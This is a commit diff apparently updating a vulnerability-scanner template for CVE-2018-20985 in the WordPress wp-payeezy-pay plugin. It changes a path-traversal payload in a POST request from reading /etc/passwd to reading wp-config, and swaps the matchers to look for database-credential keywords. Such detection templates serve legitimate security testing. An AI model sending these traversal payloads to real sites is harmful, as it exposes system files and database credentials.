Update CVE-2018-20985.yaml
parent
7afafb1f4f
commit
a0581944aa
|
@ -15,15 +15,15 @@ requests:
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php"
|
- "{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php"
|
||||||
|
|
||||||
body: "x_login=../../../etc/passwd"
|
body: "x_login=../../../../wp-config"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
- type: word
|
||||||
- type: regex
|
words:
|
||||||
regex:
|
- DB_NAME
|
||||||
- "root:[x*]:0:0"
|
- WPENGINE_ACCOUNT
|
||||||
|
part: body
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
Loading…
Reference in New Issue